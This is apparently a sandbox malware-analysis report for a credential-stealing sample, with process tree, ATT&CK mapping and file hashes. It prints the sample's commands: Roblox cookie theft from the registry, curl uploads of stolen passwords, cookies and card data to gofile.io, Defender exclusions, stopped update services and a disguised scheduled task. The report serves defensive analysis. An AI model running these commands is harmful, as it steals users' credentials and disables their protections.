4AcwBoAG8AdABzAFsAJABpAF0ADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0AC4AUwBhAHYAZQAoACIALgAvAEQAaQBzAHAAbABhAHkAIAAoACQAKAAkAGkAKwAxACkAKQAuAHAAbgBnACIAKQANAAoAIAAgACAAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQALgBEAGkAcwBwAG8AcwBlACgAKQANAAoAfQA=
        11⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:2332
        
        C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
        
        "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\zq5wm4n5\zq5wm4n5.cmdline"
        12⤵
        
        PID:9168
        
        C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
        
        C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESC4E6.tmp" "c:\Users\Admin\AppData\Local\Temp\zq5wm4n5\CSC5BF9A94A36DB48F2A4CDB845AE75AE9.TMP"
        13⤵
        
        PID:6452
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "tree /A /F"
        10⤵
        
        PID:5304
        
        C:\Windows\system32\tree.com
        
        tree /A /F
        11⤵
        
        PID:5876
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "tree /A /F"
        10⤵
        
        PID:5944
        
        C:\Windows\system32\tree.com
        
        tree /A /F
        11⤵
        
        PID:9124
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "tree /A /F"
        10⤵
        
        PID:6316
        
        C:\Windows\system32\tree.com
        
        tree /A /F
        11⤵
        
        PID:6436
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "tree /A /F"
        10⤵
        
        PID:6488
        
        C:\Windows\system32\tree.com
        
        tree /A /F
        11⤵
        
        PID:2824
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "tree /A /F"
        10⤵
        
        PID:5368
        
        C:\Windows\system32\tree.com
        
        tree /A /F
        11⤵
        
        PID:6568
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY"
        10⤵
        
        PID:6764
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
        11⤵
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:6820
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path HKLM:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY"
        10⤵
        
        PID:5900
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell Get-ItemPropertyValue -Path HKLM:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
        11⤵
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:5456
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "getmac"
        10⤵
        
        PID:5460
        
        C:\Windows\system32\getmac.exe
        
        getmac
        11⤵
        
        PID:5508
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\_MEI40362\rar.exe a -r -hp"prometheus" "C:\Users\Admin\AppData\Local\Temp\GoLVk.zip" *"
        10⤵
        
        PID:8228
        
        C:\Users\Admin\AppData\Local\Temp\_MEI40362\rar.exe
        
        C:\Users\Admin\AppData\Local\Temp\_MEI40362\rar.exe a -r -hp"prometheus" "C:\Users\Admin\AppData\Local\Temp\GoLVk.zip" *
        11⤵
        Executes dropped EXE
        
        PID:6236
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "wmic os get Caption"
        10⤵
        
        PID:6184
        
        C:\Windows\System32\Wbem\WMIC.exe
        
        wmic os get Caption
        11⤵
        Suspicious use of AdjustPrivilegeToken
        
        PID:6032
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "wmic computersystem get totalphysicalmemory"
        10⤵
        
        PID:3948
        
        C:\Windows\System32\Wbem\WMIC.exe
        
        wmic computersystem get totalphysicalmemory
        11⤵
        
        PID:5988
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "wmic csproduct get uuid"
        10⤵
        
        PID:5920
        
        C:\Windows\System32\Wbem\WMIC.exe
        
        wmic csproduct get uuid
        11⤵
        
        PID:4056
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER"
        10⤵
        
        PID:864
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER
        11⤵
        Suspicious behavior: EnumeratesProcesses
        
        PID:452
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name"
        10⤵
        
        PID:5616
        
        C:\Windows\System32\Wbem\WMIC.exe
        
        wmic path win32_VideoController get name
        11⤵
        Detects videocard installed
        
        PID:1124
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform' -Name BackupProductKeyDefault"
        10⤵
        
        PID:6260
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform' -Name BackupProductKeyDefault
        11⤵
        Suspicious behavior: EnumeratesProcesses
        
        PID:8140
  - - C:\Users\Admin\AppData\Local\Temp\svchost.exe
      "C:\Users\Admin\AppData\Local\Temp\svchost.exe"
      4⤵
      Executes dropped EXE
      Suspicious use of WriteProcessMemory
      PID:1948
    - - C:\Users\Admin\AppData\Local\Temp\svchost.exe
        
        "C:\Users\Admin\AppData\Local\Temp\svchost.exe"
        5⤵
        Drops startup file
        Executes dropped EXE
        Loads dropped DLL
        Suspicious use of WriteProcessMemory
        
        PID:2340
      - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "curl -F "file=@C:\Users\Admin\AppData\Local\Temp\cspasswords.txt" https://store1.gofile.io/uploadFile"
        6⤵
        Suspicious use of WriteProcessMemory
        
        PID:1020
        
        C:\Windows\system32\curl.exe
        
        curl -F "file=@C:\Users\Admin\AppData\Local\Temp\cspasswords.txt" https://store1.gofile.io/uploadFile
        7⤵
        
        PID:1176
      - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "curl -F "file=@C:\Users\Admin\AppData\Local\Temp\cscookies.txt" https://store1.gofile.io/uploadFile"
        6⤵
        Suspicious use of WriteProcessMemory
        
        PID:1468
        
        C:\Windows\system32\curl.exe
        
        curl -F "file=@C:\Users\Admin\AppData\Local\Temp\cscookies.txt" https://store1.gofile.io/uploadFile
        7⤵
        Blocklisted process makes network request
        
        PID:2520
      - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "curl -F "file=@C:\Users\Admin\AppData\Local\Temp\cscreditcards.txt" https://store1.gofile.io/uploadFile"
        6⤵
        Suspicious use of WriteProcessMemory
        
        PID:1172
        
        C:\Windows\system32\curl.exe
        
        curl -F "file=@C:\Users\Admin\AppData\Local\Temp\cscreditcards.txt" https://store1.gofile.io/uploadFile
        7⤵
        
        PID:4584
      - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "curl -F "file=@C:\Users\Admin\AppData\Local\Temp\csautofills.txt" https://store1.gofile.io/uploadFile"
        6⤵
        Suspicious use of WriteProcessMemory
        
        PID:4880
        
        C:\Windows\system32\curl.exe
        
        curl -F "file=@C:\Users\Admin\AppData\Local\Temp\csautofills.txt" https://store1.gofile.io/uploadFile
        7⤵
        
        PID:2304
      - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "curl -F "file=@C:\Users\Admin\AppData\Local\Temp\cshistories.txt" https://store1.gofile.io/uploadFile"
        6⤵
        Suspicious use of WriteProcessMemory
        
        PID:400
        
        C:\Windows\system32\curl.exe
        
        curl -F "file=@C:\Users\Admin\AppData\Local\Temp\cshistories.txt" https://store1.gofile.io/uploadFile
        7⤵
        Blocklisted process makes network request
        
        PID:2968
      - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "curl -F "file=@C:\Users\Admin\AppData\Local\Temp\csbookmarks.txt" https://store1.gofile.io/uploadFile"
        6⤵
        
        PID:2120
        
        C:\Windows\system32\curl.exe
        
        curl -F "file=@C:\Users\Admin\AppData\Local\Temp\csbookmarks.txt" https://store1.gofile.io/uploadFile
        7⤵
        
        PID:3540
      - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "curl -F "file=@C:\Users\Admin/Desktop/BackupExit.TS" https://store1.gofile.io/uploadFile"
        6⤵
        
        PID:5960
        
        C:\Windows\system32\curl.exe
        
        curl -F "file=@C:\Users\Admin/Desktop/BackupExit.TS" https://store1.gofile.io/uploadFile
        7⤵
        
        PID:9132
      - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "curl -F "file=@C:\Users\Admin/Downloads/BackupSave.tmp" https://store1.gofile.io/uploadFile"
        6⤵
        
        PID:5996
        
        C:\Windows\system32\curl.exe
        
        curl -F "file=@C:\Users\Admin/Downloads/BackupSave.tmp" https://store1.gofile.io/uploadFile
        7⤵
        
        PID:9140
      - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "curl -F "file=@C:\Users\Admin/Documents/BackupUnregister.xltx" https://store1.gofile.io/uploadFile"
        6⤵
        
        PID:6040
        
        C:\Windows\system32\curl.exe
        
        curl -F "file=@C:\Users\Admin/Documents/BackupUnregister.xltx" https://store1.gofile.io/uploadFile
        7⤵
        
        PID:9200
- - C:\Users\Admin\AppData\Local\Temp\RequestHunter.exe
    "C:\Users\Admin\AppData\Local\Temp\RequestHunter.exe"
    3⤵
    - Executes dropped EXE
    - Suspicious use of WriteProcessMemory
    PID:3052
  - - C:\Windows\System32\Conhost.exe
      \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
      4⤵
      PID:2160
  - - C:\Users\Admin\AppData\Local\Temp\onefile_3052_133608690441367402\RequestHunter.exe
      "C:\Users\Admin\AppData\Local\Temp\RequestHunter.exe"
      4⤵
      Executes dropped EXE
      Loads dropped DLL
      Suspicious use of WriteProcessMemory
      PID:5092
    - - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c
        5⤵
        
        PID:1856
    - - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c cls
        5⤵
        
        PID:4552
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force
  2⤵
  - Command and Scripting Interpreter: PowerShell
  PID:8492
- C:\Windows\System32\cmd.exe
  C:\Windows\System32\cmd.exe /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc
  2⤵
  PID:5296
- - C:\Windows\System32\sc.exe
    sc stop UsoSvc
    3⤵
    - Launches sc.exe
    PID:5948
- - C:\Windows\System32\sc.exe
    sc stop WaaSMedicSvc
    3⤵
    - Launches sc.exe
    PID:5972
- - C:\Windows\System32\sc.exe
    sc stop wuauserv
    3⤵
    - Launches sc.exe
    PID:6132
- - C:\Windows\System32\sc.exe
    sc stop bits
    3⤵
    - Launches sc.exe
    PID:6068
- - C:\Windows\System32\sc.exe
    sc stop dosvc
    3⤵
    - Launches sc.exe
    PID:5984
- C:\Windows\System32\dialer.exe
  C:\Windows\System32\dialer.exe
  2⤵
  PID:6444
- C:\Windows\System32\schtasks.exe
  C:\Windows\System32\schtasks.exe /delete /f /tn "GoogleUpdateTaskMachineQC"
  2⤵
  PID:6440
- C:\Windows\System32\schtasks.exe
  C:\Windows\System32\schtasks.exe /create /f /ru "System" /tn "GoogleUpdateTaskMachineQC" /xml "C:\Users\Admin\AppData\Local\Temp\yntnomxcupkb.xml"
  2⤵
  - Creates scheduled task(s)
  PID:6392
- C:\Windows\System32\schtasks.exe
  C:\Windows\System32\schtasks.exe /run /tn "GoogleUpdateTaskMachineQC"
  2⤵
  PID:6520
- - C:\Windows\System32\Conhost.exe
    \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
    3⤵
    PID:4920
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force
  2⤵
  - Command and Scripting Interpreter: PowerShell
  - Drops file in System32 directory
  - Modifies data under HKEY_USERS
  PID:8376
- - C:\Windows\System32\Conhost.exe
    \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
    3⤵
    PID:8356
- C:\Windows\System32\cmd.exe
  C:\Windows\System32\cmd.exe /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc
  2⤵
  PID:8932
- - C:\Windows\System32\Conhost.exe
    \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
    3⤵
    PID:8944
- - C:\Windows\System32\sc.exe
    sc stop UsoSvc
    3⤵
    - Launches sc.exe
    PID:8464
- - C:\Windows\System32\sc.exe
    sc stop WaaSMedicSvc
    3⤵
    - Launches sc.exe
    PID:8852
- - C:\Windows\System32\sc.exe
    sc stop wuauserv
    3⤵
    - Launches sc.exe
    PID:8668
- - C:\Windows\System32\sc.exe
    sc stop bits
    3⤵
    - Launches sc.exe
    PID:9148
- - C:\Windows\System32\sc.exe
    sc stop dosvc
    3⤵
    - Launches sc.exe
    PID:4712
- C:\Windows\System32\dialer.exe
  C:\Windows\System32\dialer.exe
  2⤵
  PID:9188
- C:\Windows\System32\schtasks.exe
  C:\Windows\System32\schtasks.exe /create /f /ru "System" /tn "GoogleUpdateTaskMachineQC" /xml "C:\Windows\TEMP\yntnomxcupkb.xml"
  2⤵
  - Creates scheduled task(s)
  PID:9128
- - C:\Windows\System32\Conhost.exe
    \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
    3⤵
    PID:6456
- C:\Windows\System32\dialer.exe
  C:\Windows\System32\dialer.exe
  2⤵
  PID:6736
- C:\Windows\System32\dialer.exe
  C:\Windows\System32\dialer.exe
  2⤵
  PID:6844
- C:\Program Files\VideoLAN\VLC\vlc.exe
  "C:\Program Files\VideoLAN\VLC\vlc.exe" --started-from-file "C:\Users\Admin\Downloads\CheckpointTest.wpl"
  2⤵
  - Suspicious behavior: AddClipboardFormatListener
  - Suspicious behavior: GetForegroundWindowSpam
  - Suspicious use of FindShellTrayWindow
  - Suspicious use of SendNotifyMessage
  - Suspicious use of SetWindowsHookEx
  PID:7296

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k ClipboardSvcGroup -p -s cbdhsvc
1⤵
PID:3548

C:\Windows\system32\DllHost.exe
C:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}
1⤵
PID:3756

C:\Windows\System32\RuntimeBroker.exe
C:\Windows\System32\RuntimeBroker.exe -Embedding
1⤵
PID:3920

C:\Windows\System32\RuntimeBroker.exe
C:\Windows\System32\RuntimeBroker.exe -Embedding
1⤵
- Checks SCSI registry key(s)
- Modifies registry class
- Suspicious use of UnmapMainImage
PID:4112

C:\Windows\System32\RuntimeBroker.exe
C:\Windows\System32\RuntimeBroker.exe -Embedding
1⤵
PID:4624

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s StorSvc
1⤵
PID:3840

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalServiceAndNoImpersonation -p -s SSDPSRV
1⤵
PID:1164

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s WinHttpAutoProxySvc
1⤵
- Modifies data under HKEY_USERS
PID:2152

C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe
"C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe" /service
1⤵
- Drops file in System32 directory
- Modifies data under HKEY_USERS
PID:1316

C:\Windows\system32\SppExtComObj.exe
C:\Windows\system32\SppExtComObj.exe -Embedding
1⤵
PID:4000

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalService -p -s LicenseManager
1⤵
PID:4456

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s wlidsvc
1⤵
PID:3764

C:\Windows\system32\DllHost.exe
C:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}
1⤵
PID:456

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s wuauserv
1⤵
- Drops file in Windows directory
PID:4696

C:\Windows\system32\wbem\wmiprvse.exe
C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
1⤵
- Checks processor information in registry
- Enumerates system info in registry
PID:1356

C:\Windows\servicing\TrustedInstaller.exe
C:\Windows\servicing\TrustedInstaller.exe
1⤵
PID:3932

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s UsoSvc
1⤵
PID:4460

C:\Windows\System32\mousocoreworker.exe
C:\Windows\System32\mousocoreworker.exe -Embedding
1⤵
PID:5108

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s PcaSvc
1⤵
PID:5012

C:\Windows\system32\wbem\wmiprvse.exe
C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
1⤵
PID:6344

C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.19041.1220_none_7e21bc567c7ed16b\TiWorker.exe
C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.19041.1220_none_7e21bc567c7ed16b\TiWorker.exe -Embedding
1⤵
PID:6500

C:\Windows\system32\DllHost.exe
C:\Windows\system32\DllHost.exe /Processid:{AB8902B4-09CA-4BB6-B78D-A8F59079A8D5}
1⤵
PID:8768

C:\Windows\System32\rundll32.exe
C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding
1⤵
PID:5468

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k WerSvcGroup
1⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
PID:4640
- C:\Windows\system32\WerFault.exe
  C:\Windows\system32\WerFault.exe -pss -s 188 -p 7692 -ip 7692
  2⤵
  - Suspicious use of NtCreateProcessExOtherParentProcess
  PID:5048

C:\Windows\system32\DllHost.exe
C:\Windows\system32\DllHost.exe /Processid:{AB8902B4-09CA-4BB6-B78D-A8F59079A8D5}
1⤵
PID:8108

C:\Windows\system32\DllHost.exe
C:\Windows\system32\DllHost.exe /Processid:{7966B4D8-4FDC-4126-A10B-39A3209AD251}
1⤵
PID:7348

C:\Windows\system32\DllHost.exe
C:\Windows\system32\DllHost.exe /Processid:{973D20D7-562D-44B9-B70B-5A0F49CCDF3F}
1⤵
PID:4156

C:\Windows\system32\DllHost.exe
C:\Windows\system32\DllHost.exe /Processid:{AB8902B4-09CA-4BB6-B78D-A8F59079A8D5}
1⤵
PID:8656

C:\Windows\system32\DllHost.exe
C:\Windows\system32\DllHost.exe /Processid:{AB8902B4-09CA-4BB6-B78D-A8F59079A8D5}
1⤵
PID:1040

C:\Windows\system32\DllHost.exe
C:\Windows\system32\DllHost.exe /Processid:{AB8902B4-09CA-4BB6-B78D-A8F59079A8D5}
1⤵
PID:2328

C:\Windows\system32\DllHost.exe
C:\Windows\system32\DllHost.exe /Processid:{AB8902B4-09CA-4BB6-B78D-A8F59079A8D5}
1⤵
PID:4936

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

T1059

PowerShell

T1059.001

Scheduled Task/Job

T1053

System Services

T1569

Service Execution

T1569.002

Persistence

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Create or Modify System Process

T1543

Windows Service

T1543.003

Scheduled Task/Job

T1053

Privilege Escalation

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Create or Modify System Process

T1543

Windows Service

T1543.003

Scheduled Task/Job

T1053

Defense Evasion

Impair Defenses

T1562

Modify Registry

T1112

Credential Access

Unsecured Credentials

T1552

Credentials In Files

T1552.001

Discovery

Network Service Discovery

T1046

Peripheral Device Discovery

T1120

Process Discovery

T1057

Query Registry

T1012

System Information Discovery

T1082

Lateral Movement

Collection

Data from Local System

T1005

Command and Control

Web Service

T1102

Exfiltration

Impact

Service Stop

T1489

Replay Monitor

Loading Replay Monitor...

Downloads

C:\ProgramData\Microsoft\based.exe

Filesize
6.0MB

MD5
74b1d20a84ac1cf3b3ddca0a285f80e5

SHA1
4fc1778be5ed6c20b6788ceaa6b31cfb91244d5b

SHA256
88b558a700d3c2aaa6e48b852deed16aa0727363a8b597a9ba3dfc979903ebef

SHA512
989c01bd9c7f508c5ae800534b4c61e26a44fa0b986901823e2b08e55bc58b1edc3b91068087e37b46346b2f11a5812484269a3668eb310cf71ffd046b37947a

Download Submit
C:\ProgramData\Microsoft\hacn.exe

Filesize
24.0MB

MD5
b9f3e6e06f33ee7078f514d41be5faad

SHA1
e2d35bc333ec6ff0f6ae60e55daca44a433fc279

SHA256
a7c3208cf3067d1da12542cab16516c9085620959deb60dd000e190f15c74758

SHA512
212a6540082a20de6798d53e2c6f7f5705e5e4164620aa7f08a366e747f240c59c4c70ce0b8dd00625a0a960d1615073b4e48b2707abe767b422f732c5927bed

Download Submit
C:\ProgramData\main.exe

Filesize
5.6MB

MD5
5df3e2c717f267899f37ec6e8fc7f47a

SHA1
5e980079f67215bf69b8c1c16b56f40bf4a29958

SHA256
e3f5c557ece7ec27cb7e4a26482eadf0d9065065d94b2919f9b881bc74800e6e

SHA512
8cef1184120e010421d69fcf271822b3f0b45e34a1565152a3f2decb8f500d0e69de9816d9075683fcfb0f431713f3fbc42ac2d87503cdcdde125aba3fa1635d

Download Submit
C:\ProgramData\setup.exe

Filesize
5.4MB

MD5
1274cbcd6329098f79a3be6d76ab8b97

SHA1
53c870d62dcd6154052445dc03888cdc6cffd370

SHA256
bbe5544c408a6eb95dd9980c61a63c4ebc8ccbeecade4de4fae8332361e27278

SHA512
a0febbd4915791d3c32531fb3cf177ee288dd80ce1c8a1e71fa9ad59a4ebddeef69b6be7f3d19e687b96dc59c8a8fa80afff8378a71431c3133f361b28e0d967

Download Submit
C:\ProgramData\svchost.exe

Filesize
12.0MB

MD5
48b277a9ac4e729f9262dd9f7055c422

SHA1
d7e8a3fa664e863243c967520897e692e67c5725

SHA256
5c832eda59809a4f51dc779bb00bd964aad42f2597a1c9f935cfb37f0888ef17

SHA512
66dd4d1a82103cd90c113df21eb693a2bffde2cde41f9f40b5b85368d5a920b66c3bc5cadaf9f9d74dfd0f499086bedd477f593184a7f755b7b210ef5e428941

Download Submit
C:\ProgramData\шева.txt

Filesize
14B

MD5
1207bc197a1ebd72a77f1a771cad9e52

SHA1
8ed121ff66d407150d7390b9276fe690dd213b27

SHA256
260658b9cb063d6ce96f681b18704e02fae7bf8fc995fc249ab0be1400983476

SHA512
d037cfa3b6e6ced9652b2c781bb54cf48dbaa0aaff05039ae4fd0122749eda472807d4198981aa6ceffeba6d2b23d7ad08d7d96983dbd8539cf6b07e46e157f4

Download Submit
C:\Users\Admin\AppData\Local\Temp\K8z3dK45rn.tmp

Filesize
48KB

MD5
349e6eb110e34a08924d92f6b334801d

SHA1
bdfb289daff51890cc71697b6322aa4b35ec9169

SHA256
c9fd7be4579e4aa942e8c2b44ab10115fa6c2fe6afd0c584865413d9d53f3b2a

SHA512
2a635b815a5e117ea181ee79305ee1baf591459427acc5210d8c6c7e447be3513ead871c605eb3d32e4ab4111b2a335f26520d0ef8c1245a4af44e1faec44574

Download Submit
C:\Users\Admin\AppData\Local\Temp\OxktOYncCE.tmp

Filesize
20KB

MD5
42c395b8db48b6ce3d34c301d1eba9d5

SHA1
b7cfa3de344814bec105391663c0df4a74310996

SHA256
5644546ecefc6786c7be5b1a89e935e640963ccd34b130f21baab9370cb9055d

SHA512
7b9214db96e9bec8745b4161a41c4c0520cdda9950f0cd3f12c7744227a25d639d07c0dd68b552cf1e032181c2e4f8297747f27bad6c7447b0f415a86bd82845

Download Submit
C:\Users\Admin\AppData\Local\Temp\QODYEpJpgz.tmp

Filesize
46KB

MD5
8f5942354d3809f865f9767eddf51314

SHA1
20be11c0d42fc0cef53931ea9152b55082d1a11e

SHA256
776ecf8411b1b0167bea724409ac9d3f8479973df223ecc6e60e3302b3b2b8ea

SHA512
fde8dfae8a862cf106b0cb55e02d73e4e4c0527c744c20886681245c8160287f722612a6de9d0046ed1156b1771229c8950b9ac036b39c988d75aa20b7bac218

Download Submit
C:\Users\Admin\AppData\Local\Temp\RequestHunter.exe

Filesize
7.1MB

MD5
0f4c7b7bc9999db13df6f34f6ce81336

SHA1
b715fc4ec21137b5924bed891cad5f6c7825bb03

SHA256
97bddd434afdf9839f0ca7cc3fdf1f708fcd68a12d2f4d0cf7eee4b92280dfab

SHA512
cca234600e132c6702394879579bf69b7ca6b8b107d194351d735ed8decd2aacc558456ec4763b7a609eb063d7388cfdfb471e6c9dfda559ca8d5b7299541d50

Download Submit
C:\Users\Admin\AppData\Local\Temp\Run.exe

Filesize
47.7MB

MD5
3355bd8fc1777ca895f4e6f899430dd3

SHA1
118bb9715e467d33a9436d6ee418c01a3e092190

SHA256
2edf24c118de1ea74c325150527c35ae2c7c0861ec5380d7680e12e1d1b8fea3

SHA512
1678178df01ea1f737c6e994de5d66775a149c23d3902036d9fe72f0febe4b4dd6d3cf36f567d60f5faaeed579bf2aee20741b434dc75dce784f90681eb2f7a8

Download Submit
C:\Users\Admin\AppData\Local\Temp\ZsUeC7u7j0.tmp

Filesize
152KB

MD5
73bd1e15afb04648c24593e8ba13e983

SHA1
4dd85ca46fcdf9d93f6b324f8bb0b5bb512a1b91

SHA256
aab0b201f392fef9fdff09e56a9d0ac33d0f68be95da270e6dab89bb1f971d8b

SHA512
6eb58fb41691894045569085bd64a83acd62277575ab002cf73d729bda4b6d43c36643a5fa336342e87a493326337ed43b8e5eaeae32f53210714699cb8dfac7

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI19482\VCRUNTIME140.dll

Filesize
106KB

MD5
870fea4e961e2fbd00110d3783e529be

SHA1
a948e65c6f73d7da4ffde4e8533c098a00cc7311

SHA256
76fdb83fde238226b5bebaf3392ee562e2cb7ca8d3ef75983bf5f9d6c7119644

SHA512
0b636a3cdefa343eb4cb228b391bb657b5b4c20df62889cd1be44c7bee94ffad6ec82dc4db79949edef576bff57867e0d084e0a597bf7bf5c8e4ed1268477e88

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI19482\_ctypes.pyd

Filesize
119KB

MD5
ca4cef051737b0e4e56b7d597238df94

SHA1
583df3f7ecade0252fdff608eb969439956f5c4a

SHA256
e60a2b100c4fa50b0b144cf825fe3cde21a8b7b60b92bfc326cb39573ce96b2b

SHA512
17103d6b5fa84156055e60f9e5756ffc31584cdb6274c686a136291c58ba0be00238d501f8acc1f1ca7e1a1fadcb0c7fefddcb98cedb9dd04325314f7e905df3

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI19482\base_library.zip

Filesize
812KB

MD5
fbd6be906ac7cd45f1d98f5cb05f8275

SHA1
5d563877a549f493da805b4d049641604a6a0408

SHA256
ae35709e6b8538827e3999e61a0345680c5167962296ac7bef62d6b813227fb0

SHA512
1547b02875f3e547c4f5e15c964719c93d7088c7f4fd044f6561bebd29658a54ef044211f9d5cfb4570ca49ed0f17b08011d27fe85914e8c3ea12024c8071e8a

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI19482\libffi-7.dll

Filesize
32KB

MD5
eef7981412be8ea459064d3090f4b3aa

SHA1
c60da4830ce27afc234b3c3014c583f7f0a5a925

SHA256
f60dd9f2fcbd495674dfc1555effb710eb081fc7d4cae5fa58c438ab50405081

SHA512
dc9ff4202f74a13ca9949a123dff4c0223da969f49e9348feaf93da4470f7be82cfa1d392566eaaa836d77dde7193fed15a8395509f72a0e9f97c66c0a096016

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI19482\python310.dll

Filesize
4.3MB

MD5
deaf0c0cc3369363b800d2e8e756a402

SHA1
3085778735dd8badad4e39df688139f4eed5f954

